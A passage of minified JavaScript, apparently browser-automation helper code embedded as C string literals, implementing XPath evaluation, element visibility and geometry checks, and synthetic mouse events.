"b;)b=b.parentNode;return b==a}\nfunction Ea(a,b){if(a==b)return 0;if(a."\
"compareDocumentPosition)return a.compareDocumentPosition(b)&2?1:-1;if("\
"\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in a.parentNode){var "\
"c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIn"\
"dex;var e=a.parentNode,f=b.parentNode;return e==f?Fa(a,b):!c&&Da(e,b)?-"\
"1*Ga(a,b):!d&&Da(f,a)?Ga(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sour"\
"ceIndex:f.sourceIndex)}d=v(a);c=d.createRange();c.selectNode(a);c.colla"\
"pse(!0);d=d.createRange();d.selectNode(b);\nd.collapse(!0);return c.com"\
"pareBoundaryPoints(k.Range.START_TO_END,d)}function Ga(a,b){var c=a.par"\
"entNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;re"\
"turn Fa(d,a)}function Fa(a,b){for(var c=b;c=c.previousSibling;)if(c==a)"\
"return-1;return 1}function v(a){return 9==a.nodeType?a:a.ownerDocument|"\
"|a.document}function Ha(a,b,c){c||(a=a.parentNode);for(c=0;a;){if(b(a))"\
"return a;a=a.parentNode;c++}return null}function w(a){this.G=a||k.docum"\
"ent||document}\nw.prototype.i=function(a){return l(a)?this.G.getElement"\
"ById(a):a};function Ia(a){var b=a.G;a=b.body;b=b.parentWindow||b.defaul"\
"tView;return new t(b.pageXOffset||a.scrollLeft,b.pageYOffset||a.scrollT"\
"op)}w.prototype.contains=Da;function x(a){var b=null,c=a.nodeType;1==c&"\
"&(b=a.textContent,b=void 0==b||null==b?a.innerText:b,b=void 0==b||null="\
"=b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a.documentElem"\
"ent:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeType&&(b+=a.no"\
"deValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c].nextSibling)"\
";);}}else b=a.nodeValue;return\"\"+b}\nfunction y(a,b,c){if(null===b)re"\
"turn!0;try{if(!a.getAttribute)return!1}catch(d){return!1}return null==c"\
"?!!a.getAttribute(b):a.getAttribute(b,2)==c}function Ja(a,b,c,d,e){retu"\
"rn Ka.call(null,a,b,l(c)?c:null,l(d)?d:null,e||new z)}\nfunction Ka(a,b"\
",c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.getElementsByName(d),n"\
"(b,function(b){a.matches(b)&&e.add(b)})):b.getElementsByClassName&&d&&"\
"\"class\"==c?(b=b.getElementsByClassName(d),n(b,function(b){b.className"\
"==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.getElements"\
"ByTagName(a.getName()),n(b,function(a){y(a,c,d)&&e.add(a)}));return e}f"\
"unction La(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)y(b,c,d)&&a."\
"matches(b)&&e.add(b);return e}\nfunction Ma(a,b,c,d,e){for(b=b.firstChi"\
"ld;b;b=b.nextSibling)y(b,c,d)&&a.matches(b)&&e.add(b),Ma(a,b,c,d,e)};fu"\
"nction z(){this.h=this.g=null;this.q=0}function Na(a){this.J=a;this.nex"\
"t=this.A=null}z.prototype.unshift=function(a){a=new Na(a);a.next=this.g"\
";this.h?this.g.A=a:this.g=this.h=a;this.g=a;this.q++};z.prototype.add=f"\
"unction(a){a=new Na(a);a.A=this.h;this.g?this.h.next=a:this.g=this.h=a;"\
"this.h=a;this.q++};function Oa(a){return(a=a.g)?a.J:null}function Pa(a)"\
"{return(a=Oa(a))?x(a):\"\"}function A(a,b){this.ea=a;this.F=(this.K=b)?"\
"a.h:a.g;this.Q=null}\nA.prototype.next=function(){var a=this.F;if(null="\
"=a)return null;var b=this.Q=a;this.F=this.K?a.A:a.next;return b.J};func"\
"tion B(a,b){var c=a.evaluate(b);return c instanceof z?+Pa(c):+c}functio"\
"n D(a,b){var c=a.evaluate(b);return c instanceof z?Pa(c):\"\"+c}functio"\
"n E(a,b){var c=a.evaluate(b);return c instanceof z?!!c.q:!!c};function "\
"H(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var f;if(b instanceof z&&c"\
" instanceof z){e=new A(b,!1);for(d=e.next();d;d=e.next())for(b=new A(c,"\
"!1),f=b.next();f;f=b.next())if(a(x(d),x(f)))return!0;return!1}if(b inst"\
"anceof z||c instanceof z){b instanceof z?e=b:(e=c,c=b);e=new A(e,!1);b="\
"typeof c;for(d=e.next();d;d=e.next()){switch(b){case \"number\":d=+x(d)"\
";break;case \"boolean\":d=!!x(d);break;case \"string\":d=x(d);break;def"\
"ault:throw Error(\"Illegal primitive type for comparison.\");}if(a(d,c)"\
")return!0}return!1}return e?\n\"boolean\"==typeof b||\"boolean\"==typeo"\
"f c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a(+b,+c):a(b,"\
"c):a(+b,+c)}function Qa(a,b,c,d){this.R=a;this.ha=b;this.N=c;this.o=d}Q"\
"a.prototype.toString=g(\"R\");var Ra={};function I(a,b,c,d){if(a in Ra)"\
"throw Error(\"Binary operator already created: \"+a);a=new Qa(a,b,c,d);"\
"Ra[a.toString()]=a}I(\"div\",6,1,function(a,b,c){return B(a,c)/B(b,c)})"\
";I(\"mod\",6,1,function(a,b,c){return B(a,c)%B(b,c)});I(\"*\",6,1,funct"\
"ion(a,b,c){return B(a,c)*B(b,c)});\nI(\"+\",5,1,function(a,b,c){return "\
"B(a,c)+B(b,c)});I(\"-\",5,1,function(a,b,c){return B(a,c)-B(b,c)});I(\""\
"<\",4,2,function(a,b,c){return H(function(a,b){return a<b},a,b,c)});I("\
"\">\",4,2,function(a,b,c){return H(function(a,b){return a>b},a,b,c)});I"\
"(\"<=\",4,2,function(a,b,c){return H(function(a,b){return a<=b},a,b,c)}"\
");I(\">=\",4,2,function(a,b,c){return H(function(a,b){return a>=b},a,b,"\
"c)});I(\"=\",3,2,function(a,b,c){return H(function(a,b){return a==b},a,"\
"b,c,!0)});\nI(\"!=\",3,2,function(a,b,c){return H(function(a,b){return "\
"a!=b},a,b,c,!0)});I(\"and\",2,2,function(a,b,c){return E(a,c)&&E(b,c)})"\
";I(\"or\",1,2,function(a,b,c){return E(a,c)||E(b,c)});function Sa(a,b,c"\
",d,e,f,h,q,p){this.w=a;this.N=b;this.ca=c;this.ba=d;this.aa=e;this.o=f;"\
"this.$=h;this.Z=void 0!==q?q:h;this.fa=!!p}Sa.prototype.toString=g(\"w"\
"\");var Ta={};function J(a,b,c,d,e,f,h,q){if(a in Ta)throw Error(\"Func"\
"tion already created: \"+a+\".\");Ta[a]=new Sa(a,b,c,d,!1,e,f,h,q)}J(\""\
"boolean\",2,!1,!1,function(a,b){return E(b,a)},1);J(\"ceiling\",1,!1,!1"\
",function(a,b){return Math.ceil(B(b,a))},1);\nJ(\"concat\",3,!1,!1,func"\
"tion(a,b){var c=ja(arguments,1);return ga(c,function(b,c){return b+D(c,"\
"a)})},2,null);J(\"contains\",2,!1,!1,function(a,b,c){b=D(b,a);a=D(c,a);"\
"return-1!=b.indexOf(a)},2);J(\"count\",1,!1,!1,function(a,b){return b.e"\
"valuate(a).q},1,1,!0);J(\"false\",2,!1,!1,aa(!1),0);J(\"floor\",1,!1,!1"\
",function(a,b){return Math.floor(B(b,a))},1);\nJ(\"id\",4,!1,!1,functio"\
"n(a,b){var c=a.k,d=9==c.nodeType?c:c.ownerDocument,c=D(b,a).split(/\\s+"\
"/),e=[];n(c,function(a){(a=d.getElementById(a))&&!ia(e,a)&&e.push(a)});"\
"e.sort(Ea);var f=new z;n(e,function(a){f.add(a)});return f},1);J(\"lang"\
"\",2,!1,!1,aa(!1),1);J(\"last\",1,!0,!1,function(a){if(1!=arguments.len"\
"gth)throw Error(\"Function last expects ()\");return a.h},0);J(\"local-"\
"name\",3,!1,!0,function(a,b){var c=b?Oa(b.evaluate(a)):a.k;return c?c.n"\
"odeName.toLowerCase():\"\"},0,1,!0);\nJ(\"name\",3,!1,!0,function(a,b){"\
"var c=b?Oa(b.evaluate(a)):a.k;return c?c.nodeName.toLowerCase():\"\"},0"\
",1,!0);J(\"namespace-uri\",3,!0,!1,aa(\"\"),0,1,!0);J(\"normalize-space"\
"\",3,!1,!0,function(a,b){return(b?D(b,a):x(a.k)).replace(/[\\s\\xa0]+/g"\
",\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);J(\"not\",2,!1,!1,function(a"\
",b){return!E(b,a)},1);J(\"number\",1,!1,!0,function(a,b){return b?B(b,a"\
"):+x(a.k)},0,1);J(\"position\",1,!0,!1,function(a){return a.ga},0);J(\""\
"round\",1,!1,!1,function(a,b){return Math.round(B(b,a))},1);\nJ(\"start"\
"s-with\",2,!1,!1,function(a,b,c){b=D(b,a);a=D(c,a);return 0==b.lastInde"\
"xOf(a,0)},2);J(\"string\",3,!1,!0,function(a,b){return b?D(b,a):x(a.k)}"\
",0,1);J(\"string-length\",1,!1,!0,function(a,b){return(b?D(b,a):x(a.k))"\
".length},0,1);\nJ(\"substring\",3,!1,!1,function(a,b,c,d){c=B(c,a);if(i"\
"sNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?B(d,a):Infinity;if(is"\
"NaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,0);"\
"a=D(b,a);if(Infinity==d)return a.substring(e);b=Math.round(d);return a."\
"substring(e,c+b)},2,3);J(\"substring-after\",3,!1,!1,function(a,b,c){b="\
"D(b,a);a=D(c,a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length)"\
"},2);\nJ(\"substring-before\",3,!1,!1,function(a,b,c){b=D(b,a);a=D(c,a)"\
";a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);J(\"sum\",1,!1,!1"\
",function(a,b){var c;c=b.evaluate(a);c=new A(c,!1);for(var d=0,e=c.next"\
"();e;e=c.next())d+=+x(e);return d},1,1,!0);J(\"translate\",3,!1,!1,func"\
"tion(a,b,c,d){b=D(b,a);c=D(c,a);var e=D(d,a);a=[];for(d=0;d<c.length;d+"\
"+){var f=c.charAt(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b.leng"\
"th;d++)f=b.charAt(d),c+=f in a?a[f]:f;return c},3);J(\"true\",2,!1,!1,a"\
"a(!0),0);function Ua(a,b,c,d){this.w=a;this.W=b;this.K=c;this.ka=d}Ua.p"\
"rototype.toString=g(\"w\");var Va={};function K(a,b,c,d){if(a in Va)thr"\
"ow Error(\"Axis already created: \"+a);Va[a]=new Ua(a,b,c,!!d)}K(\"ance"\
"stor\",function(a,b){for(var c=new z,d=b;d=d.parentNode;)a.matches(d)&&"\
"c.unshift(d);return c},!0);K(\"ancestor-or-self\",function(a,b){var c=n"\
"ew z,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},"\
"!0);\nK(\"attribute\",function(a,b){var c=new z,d=a.getName(),e=b.attri"\
"butes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e.getNa"\
"medItem(d))&&c.add(f);return c},!1);K(\"child\",function(a,b,c,d,e){ret"\
"urn La.call(null,a,b,l(c)?c:null,l(d)?d:null,e||new z)},!1,!0);K(\"desc"\
"endant\",Ja,!1,!0);K(\"descendant-or-self\",function(a,b,c,d){var e=new"\
" z;y(b,c,d)&&a.matches(b)&&e.add(b);return Ja(a,b,c,d,e)},!1,!0);\nK(\""\
"following\",function(a,b,c,d){var e=new z;do for(var f=b;f=f.nextSiblin"\
"g;)y(f,c,d)&&a.matches(f)&&e.add(f),e=Ja(a,f,c,d,e);while(b=b.parentNod"\
"e);return e},!1,!0);K(\"following-sibling\",function(a,b){for(var c=new"\
" z,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);K(\"namesp"\
"ace\",function(){return new z},!1);K(\"parent\",function(a,b){var c=new"\
" z;if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerEleme"\
"nt),c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nK(\"pre"\
"ceding\",function(a,b,c,d){var e=new z,f=[];do f.unshift(b);while(b=b.p"\
"arentNode);for(var h=1,q=f.length;h<q;h++){var p=[];for(b=f[h];b=b.prev"\
"iousSibling;)p.unshift(b);for(var C=0,Aa=p.length;C<Aa;C++)b=p[C],y(b,c"\
",d)&&a.matches(b)&&e.add(b),e=Ja(a,b,c,d,e)}return e},!0,!0);K(\"preced"\
"ing-sibling\",function(a,b){for(var c=new z,d=b;d=d.previousSibling;)a."\
"matches(d)&&c.unshift(d);return c},!0);K(\"self\",function(a,b){var c=n"\
"ew z;a.matches(b)&&c.add(b);return c},!1);var L={};L.L=function(){var a"\
"={la:\"http://www.w3.org/2000/svg\"};return function(b){return a[b]||nu"\
"ll}}();L.o=function(a,b,c){var d=v(a);try{var e=d.createNSResolver?d.cr"\
"eateNSResolver(d.documentElement):L.L;return d.evaluate(b,a,e,c,null)}c"\
"atch(f){throw new r(32,\"Unable to locate an element with the xpath exp"\
"ression \"+b+\" because of the following error:\\n\"+f);}};\nL.D=functi"\
"on(a,b){if(!a||1!=a.nodeType)throw new r(32,'The result of the xpath ex"\
"pression \"'+b+'\" is: '+a+\". It should be an element.\");};L.S=functi"\
"on(a,b){var c=function(){var c=L.o(b,a,9);return c?c.singleNodeValue||n"\
"ull:b.selectSingleNode?(c=v(b),c.setProperty&&c.setProperty(\"Selection"\
"Language\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||L.D(c,a)"\
";return c};\nL.Y=function(a,b){var c=function(){var c=L.o(b,a,7);if(c){"\
"for(var e=c.snapshotLength,f=[],h=0;h<e;++h)f.push(c.snapshotItem(h));r"\
"eturn f}return b.selectNodes?(c=v(b),c.setProperty&&c.setProperty(\"Sel"\
"ectionLanguage\",\"XPath\"),b.selectNodes(a)):[]}();n(c,function(b){L.D"\
"(b,a)});return c};var Wa,Xa=/Chrome\\/([0-9.]+)/.exec(k.navigator?k.nav"\
"igator.userAgent:null);Wa=Xa?Xa[1]:\"\";function M(a,b,c,d){this.top=a;"\
"this.right=b;this.bottom=c;this.left=d}M.prototype.toString=function(){"\
"return\"(\"+this.top+\"t, \"+this.right+\"r, \"+this.bottom+\"b, \"+thi"\
"s.left+\"l)\"};M.prototype.contains=function(a){return this&&a?a instan"\
"ceof M?a.left>=this.left&&a.right<=this.right&&a.top>=this.top&&a.botto"\
"m<=this.bottom:a.x>=this.left&&a.x<=this.right&&a.y>=this.top&&a.y<=thi"\
"s.bottom:!1};\nM.prototype.ceil=function(){this.top=Math.ceil(this.top)"\
";this.right=Math.ceil(this.right);this.bottom=Math.ceil(this.bottom);th"\
"is.left=Math.ceil(this.left);return this};M.prototype.floor=function(){"\
"this.top=Math.floor(this.top);this.right=Math.floor(this.right);this.bo"\
"ttom=Math.floor(this.bottom);this.left=Math.floor(this.left);return thi"\
"s};\nM.prototype.round=function(){this.top=Math.round(this.top);this.ri"\
"ght=Math.round(this.right);this.bottom=Math.round(this.bottom);this.lef"\
"t=Math.round(this.left);return this};function N(a,b,c,d){this.left=a;th"\
"is.top=b;this.width=c;this.height=d}N.prototype.toString=function(){ret"\
"urn\"(\"+this.left+\", \"+this.top+\" - \"+this.width+\"w x \"+this.hei"\
"ght+\"h)\"};N.prototype.contains=function(a){return a instanceof N?this"\
".left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&t"\
"his.top+this.height>=a.top+a.height:a.x>=this.left&&a.x<=this.left+this"\
".width&&a.y>=this.top&&a.y<=this.top+this.height};\nN.prototype.ceil=fu"\
"nction(){this.left=Math.ceil(this.left);this.top=Math.ceil(this.top);th"\
"is.width=Math.ceil(this.width);this.height=Math.ceil(this.height);retur"\
"n this};N.prototype.floor=function(){this.left=Math.floor(this.left);th"\
"is.top=Math.floor(this.top);this.width=Math.floor(this.width);this.heig"\
"ht=Math.floor(this.height);return this};\nN.prototype.round=function(){"\
"this.left=Math.round(this.left);this.top=Math.round(this.top);this.widt"\
"h=Math.round(this.width);this.height=Math.round(this.height);return thi"\
"s};function O(a,b){var c=v(a);return c.defaultView&&c.defaultView.getCo"\
"mputedStyle&&(c=c.defaultView.getComputedStyle(a,null))?c[b]||c.getProp"\
"ertyValue(b)||\"\":\"\"}function P(a,b){return O(a,b)||(a.currentStyle?"\
"a.currentStyle[b]:null)||a.style&&a.style[b]}function Ya(a){var b;try{b"\
"=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom:"\
"0}}return b}\nfunction Za(a){var b=v(a),c=P(a,\"position\"),d=\"fixed\""\
"==c||\"absolute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a"\
",\"position\"),d=d&&\"static\"==c&&a!=b.documentElement&&a!=b.body,!d&&"\
"(a.scrollWidth>a.clientWidth||a.scrollHeight>a.clientHeight||\"fixed\"="\
"=c||\"absolute\"==c||\"relative\"==c))return a;return null}\nfunction $"\
"a(a){var b=v(a),c=P(a,\"position\"),d=new t(0,0),e=(b?v(b):document).do"\
"cumentElement;if(a==e)return d;if(a.getBoundingClientRect)a=Ya(a),b=Ia("\
"b?new w(v(b)):za||(za=new w)),d.x=a.left+b.x,d.y=a.top+b.y;else if(b.ge"\
"tBoxObjectFor)a=b.getBoxObjectFor(a),b=b.getBoxObjectFor(e),d.x=a.scree"\
"nX-b.screenX,d.y=a.screenY-b.screenY;else{var f=a;do{d.x+=f.offsetLeft;"\
"d.y+=f.offsetTop;f!=a&&(d.x+=f.clientLeft||0,d.y+=f.clientTop||0);if(\""\
"fixed\"==P(f,\"position\")){d.x+=b.body.scrollLeft;d.y+=b.body.scrollTo"\
"p;\nbreak}f=f.offsetParent}while(f&&f!=a);\"absolute\"==c&&(d.y-=b.body"\
".offsetTop);for(f=a;(f=Za(f))&&f!=b.body&&f!=e;)d.x-=f.scrollLeft,d.y-="\
"f.scrollTop}return d}function ab(a){if(1==a.nodeType){if(a.getBoundingC"\
"lientRect)a=Ya(a),a=new t(a.left,a.top);else{var b=Ia(a?new w(v(a)):za|"\
"|(za=new w));a=$a(a);a=new t(a.x-b.x,a.y-b.y)}return a}var b=m(a.H),c=a"\
";a.targetTouches?c=a.targetTouches[0]:b&&a.H().targetTouches&&(c=a.H()."\
"targetTouches[0]);return new t(c.clientX,c.clientY)}\nfunction bb(a){va"\
"r b=a.offsetWidth,c=a.offsetHeight;return void 0!==b&&(b||c)||!a.getBou"\
"ndingClientRect?new u(b,c):(a=Ya(a),new u(a.right-a.left,a.bottom-a.top"\
"))};function cb(a){var b;a:{a=v(a);try{b=a&&a.activeElement;break a}cat"\
"ch(c){}b=null}return b}function Q(a,b){return!!a&&1==a.nodeType&&(!b||a"\
".tagName.toUpperCase()==b)}function db(a){return eb(a,!0)&&fb(a)&&\"non"\
"e\"!=R(a,\"pointer-events\")}function gb(a){return Q(a,\"OPTION\")?!0:Q"\
"(a,\"INPUT\")?(a=a.type.toLowerCase(),\"checkbox\"==a||\"radio\"==a):!1"\
"}\nfunction hb(a){if(!gb(a))throw new r(15,\"Element is not selectable"\
"\");var b=\"selected\",c=a.type&&a.type.toLowerCase();if(\"checkbox\"=="\
"c||\"radio\"==c)b=\"checked\";return!!a[b]}var ib=\"BUTTON INPUT OPTGRO"\
"UP OPTION SELECT TEXTAREA\".split(\" \");\nfunction fb(a){var b=a.tagNa"\
"me.toUpperCase();return ia(ib,b)?a.disabled?!1:a.parentNode&&1==a.paren"\
"tNode.nodeType&&\"OPTGROUP\"==b||\"OPTION\"==b?fb(a.parentNode):!Ha(a,f"\
"unction(a){var b=a.parentNode;if(b&&Q(b,\"FIELDSET\")&&b.disabled){if(!"\
"Q(a,\"LEGEND\"))return!0;for(;a=void 0!=a.previousElementSibling?a.prev"\
"iousElementSibling:Ca(a.previousSibling);)if(Q(a,\"LEGEND\"))return!0}r"\
"eturn!1},!0):!0}\nfunction S(a){for(a=a.parentNode;a&&1!=a.nodeType&&9!"\
"=a.nodeType&&11!=a.nodeType;)a=a.parentNode;return Q(a)?a:null}\nfuncti"\
"on R(a,b){var c=ea(b);if(\"float\"==c||\"cssFloat\"==c||\"styleFloat\"="\
"=c)c=\"cssFloat\";c=O(a,c)||jb(a,c);if(null===c)c=null;else if(ia(la,b)"\
"&&(oa.test(\"#\"==c.charAt(0)?c:\"#\"+c)||sa(c).length||ka&&ka[c.toLowe"\
"rCase()]||qa(c).length)){var d=qa(c);if(!d.length){a:if(d=sa(c),!d.leng"\
"th){d=(d=ka[c.toLowerCase()])?d:\"#\"==c.charAt(0)?c:\"#\"+c;if(oa.test"\
"(d)&&(d=na(d),d=na(d),d=[parseInt(d.substr(1,2),16),parseInt(d.substr(3"\
",2),16),parseInt(d.substr(5,2),16)],d.length))break a;d=[]}3==d.length&"\
"&d.push(1)}c=4!=\nd.length?c:\"rgba(\"+d.join(\", \")+\")\"}return c}fu"\
"nction jb(a,b){var c=a.currentStyle||a.style,d=c[b];void 0===d&&m(c.get"\
"PropertyValue)&&(d=c.getPropertyValue(b));return\"inherit\"!=d?void 0!="\
"=d?d:null:(c=S(a))?jb(c,b):null}\nfunction eb(a,b){function c(a){if(\"n"\
"one\"==R(a,\"display\"))return!1;a=S(a);return!a||c(a)}function d(a){va"\
"r b=T(a);return 0<b.height&&0<b.width?!0:Q(a,\"PATH\")&&(0<b.height||0<"\
"b.width)?(a=R(a,\"stroke-width\"),!!a&&0<parseInt(a,10)):\"hidden\"!=R("\
"a,\"overflow\")&&ha(a.childNodes,function(a){return a.nodeType==Ba||Q(a"\
")&&d(a)})}function e(a){var b=R(a,\"-o-transform\")||R(a,\"-webkit-tran"\
"sform\")||R(a,\"-ms-transform\")||R(a,\"-moz-transform\")||R(a,\"transf"\
"orm\");if(b&&\"none\"!==b)return b=ab(a),a=T(a),0<=b.x+a.width&&\n0<=b."\
"y+a.height?!0:!1;a=S(a);return!a||e(a)}if(!Q(a))throw Error(\"Argument "\
"to isShown must be of type Element\");if(Q(a,\"OPTION\")||Q(a,\"OPTGROU"\
"P\")){var f=Ha(a,function(a){return Q(a,\"SELECT\")});return!!f&&eb(f,!"\
"0)}return(f=kb(a))?!!f.I&&0<f.rect.width&&0<f.rect.height&&eb(f.I,b):Q("\
"a,\"INPUT\")&&\"hidden\"==a.type.toLowerCase()||Q(a,\"NOSCRIPT\")||\"hi"\
"dden\"==R(a,\"visibility\")||!c(a)||!b&&0==lb(a)||!d(a)||mb(a)==nb?!1:e"\
"(a)}var nb=\"hidden\";\nfunction mb(a){function b(a){var b=a;if(\"visib"\
"le\"==q)if(a==f)b=h;else if(a==h)return{x:\"visible\",y:\"visible\"};b="\
"{x:R(b,\"overflow-x\"),y:R(b,\"overflow-y\")};a==f&&(b.x=\"hidden\"==b."\
"x?\"hidden\":\"auto\",b.y=\"hidden\"==b.y?\"hidden\":\"auto\");return b"\
"}function c(a){var b=R(a,\"position\");if(\"fixed\"==b)return f;for(a=S"\
"(a);a&&a!=f&&(0==R(a,\"display\").lastIndexOf(\"inline\",0)||\"absolute"\
"\"==b&&\"static\"==R(a,\"position\"));)a=S(a);return a}var d=T(a),e=v(a"\
"),f=e.documentElement,h=e.body,q=R(f,\"overflow\");for(a=c(a);a;a=\nc(a"\
")){var p=T(a),e=b(a),C=d.left>=p.left+p.width,p=d.top>=p.top+p.height;i"\
"f(C&&\"hidden\"==e.x||p&&\"hidden\"==e.y)return nb;if(C&&\"visible\"!=e"\
".x||p&&\"visible\"!=e.y)return mb(a)==nb?nb:\"scroll\"}return\"none\"}"\
"\nfunction T(a){var b=kb(a);if(b)return b.rect;if(m(a.getBBox))try{var "\
"c=a.getBBox();return new N(c.x,c.y,c.width,c.height)}catch(d){throw d;}"\
"else{if(Q(a,\"HTML\"))return a=((v(a)?v(a).parentWindow||v(a).defaultVi"\
"ew:window)||window).document,a=\"CSS1Compat\"==a.compatMode?a.documentE"\
"lement:a.body,a=new u(a.clientWidth,a.clientHeight),new N(0,0,a.width,a"\
".height);var b=ab(a),c=a.offsetWidth,e=a.offsetHeight;c||(e||!a.getBoun"\
"dingClientRect)||(a=a.getBoundingClientRect(),c=a.right-a.left,e=a.bott"\
"om-a.top);\nreturn new N(b.x,b.y,c,e)}}function kb(a){var b=Q(a,\"MAP\""\
");if(!b&&!Q(a,\"AREA\"))return null;var c=b?a:Q(a.parentNode,\"MAP\")?a"\
".parentNode:null,d=null,e=null;if(c&&c.name&&(d=L.S('/descendant::*[@us"\
"emap = \"#'+c.name+'\"]',v(c)))&&(e=T(d),!b&&\"default\"!=a.shape.toLow"\
"erCase())){var f=ob(a);a=Math.min(Math.max(f.left,0),e.width);b=Math.mi"\
"n(Math.max(f.top,0),e.height);c=Math.min(f.width,e.width-a);f=Math.min("\
"f.height,e.height-b);e=new N(a+e.left,b+e.top,c,f)}return{I:d,rect:e||n"\
"ew N(0,0,0,0)}}\nfunction ob(a){var b=a.shape.toLowerCase();a=a.coords."\
"split(\",\");if(\"rect\"==b&&4==a.length){var b=a[0],c=a[1];return new "\
"N(b,c,a[2]-b,a[3]-c)}if(\"circle\"==b&&3==a.length)return b=a[2],new N("\
"a[0]-b,a[1]-b,2*b,2*b);if(\"poly\"==b&&2<a.length){for(var b=a[0],c=a[1"\
"],d=b,e=c,f=2;f+1<a.length;f+=2)b=Math.min(b,a[f]),d=Math.max(d,a[f]),c"\
"=Math.min(c,a[f+1]),e=Math.max(e,a[f+1]);return new N(b,c,d-b,e-c)}retu"\
"rn new N(0,0,0,0)}\nfunction lb(a){var b=1,c=R(a,\"opacity\");c&&(b=Num"\
"ber(c));(a=S(a))&&(b*=lb(a));return b};function pb(a,b){this.c=da.docum"\
"ent.documentElement;this.f=null;var c=cb(this.c);c&&qb(this,c);this.r=a"\
"||new rb;this.P=b||new sb}pb.prototype.i=g(\"c\");function qb(a,b){a.c="\
"b;a.f=Q(b,\"OPTION\")?Ha(b,function(a){return Q(a,\"SELECT\")}):null}\n"\
"pb.prototype.p=function(a,b,c,d,e,f,h){if(!f&&!db(this.c))return!1;if(d"\
"&&tb!=a&&ub!=a)throw new r(12,\"Event type does not allow related targe"\
"t: \"+a);b={clientX:b.x,clientY:b.y,button:c,altKey:0!=(this.r.s&4),ctr"\
"lKey:0!=(this.r.s&2),shiftKey:0!=(this.r.s&1),metaKey:0!=(this.r.s&8),w"\
"heelDelta:e||0,relatedTarget:d||null};h=h||1;c=this.c;if(a!=U&&a!=vb&&h"\
" in wb)c=wb[h];else if(this.f)a:switch(a){case U:case xb:c=this.f.multi"\
"ple?this.c:this.f;break a;default:c=this.f.multiple?this.c:null}return "\
"c?this.P.p(c,\na,b):!0};function rb(){this.s=0}var wb={};function sb(){"\
"}sb.prototype.p=function(a,b,c){return yb(a,b,c)};function zb(a,b,c){th"\
"is.t=a;this.B=b;this.C=c}zb.prototype.create=function(a){a=v(a).createE"\
"vent(\"HTMLEvents\");a.initEvent(this.t,this.B,this.C);return a};zb.pro"\
"totype.toString=g(\"t\");function V(a,b,c){zb.call(this,a,b,c)}ca(V,zb)"\
";\nV.prototype.create=function(a,b){if(this==Ab)throw new r(9,\"Browser"\
" does not support a mouse pixel scroll event.\");var c=v(a),d=c?c.paren"\
"tWindow||c.defaultView:window,c=c.createEvent(\"MouseEvents\");this==Bb"\
"&&(c.wheelDelta=b.wheelDelta);c.initMouseEvent(this.t,this.B,this.C,d,1"\
",0,0,b.clientX,b.clientY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,b.butt"\
"on,b.relatedTarget);return c};\nvar Cb=new zb(\"change\",!0,!1),U=new V"\
"(\"click\",!0,!0),Db=new V(\"contextmenu\",!0,!0),Eb=new V(\"dblclick\""\
",!0,!0),vb=new V(\"mousedown\",!0,!0),Fb=new V(\"mousemove\",!0,!1),ub="\
"new V(\"mouseout\",!0,!0),tb=new V(\"mouseover\",!0,!0),xb=new V(\"mous"\
"eup\",!0,!0),Bb=new V(\"mousewheel\",!0,!0),Ab=new V(\"MozMousePixelScr"\
"oll\",!0,!0);function yb(a,b,c){b=b.create(a,c);\"isTrusted\"in b||(b.i"\
"sTrusted=!1);return a.dispatchEvent(b)};function W(a,b){this.j={};this."\
"d=[];var c=arguments.length;if(1<c){if(c%2)throw Error(\"Uneven number "\
"of arguments\");for(var d=0;d<c;d+=2)this.set(arguments[d],arguments[d+"\
"1])}else if(a){var e;if(a instanceof W)for(d=Gb(a),Hb(a),e=[],c=0;c<a.d"\
".length;c++)e.push(a.j[a.d[c]]);else{var c=[],f=0;for(d in a)c[f++]=d;d"\
"=c;c=[];f=0;for(e in a)c[f++]=a[e];e=c}for(c=0;c<d.length;c++)this.set("\
"d[c],e[c])}}W.prototype.u=0;W.prototype.T=0;function Gb(a){Hb(a);return"\
" a.d.concat()}\nfunction Hb(a){if(a.u!=a.d.length){for(var b=0,c=0;b<a."\
"d.length;){var d=a.d[b];Object.prototype.hasOwnProperty.call(a.j,d)&&(a"\
".d[c++]=d);b++}a.d.length=c}if(a.u!=a.d.length){for(var e={},c=b=0;b<a."\
"d.length;)d=a.d[b],Object.prototype.hasOwnProperty.call(e,d)||(a.d[c++]"\
"=d,e[d]=1),b++;a.d.length=c}}W.prototype.get=function(a,b){return Objec"\
"t.prototype.hasOwnProperty.call(this.j,a)?this.j[a]:b};\nW.prototype.se"\
"t=function(a,b){Object.prototype.hasOwnProperty.call(this.j,a)||(this.u"\
"++,this.d.push(a),this.T++);this.j[a]=b};var Ib={};function X(a,b,c){va"\
"r d=typeof a;(\"object\"==d&&null!=a||\"function\"==d)&&(a=a.a);a=new J"\
"b(a,b,c);!b||b in Ib&&!c||(Ib[b]={key:a,shift:!1},c&&(Ib[c]={key:a,shif"\
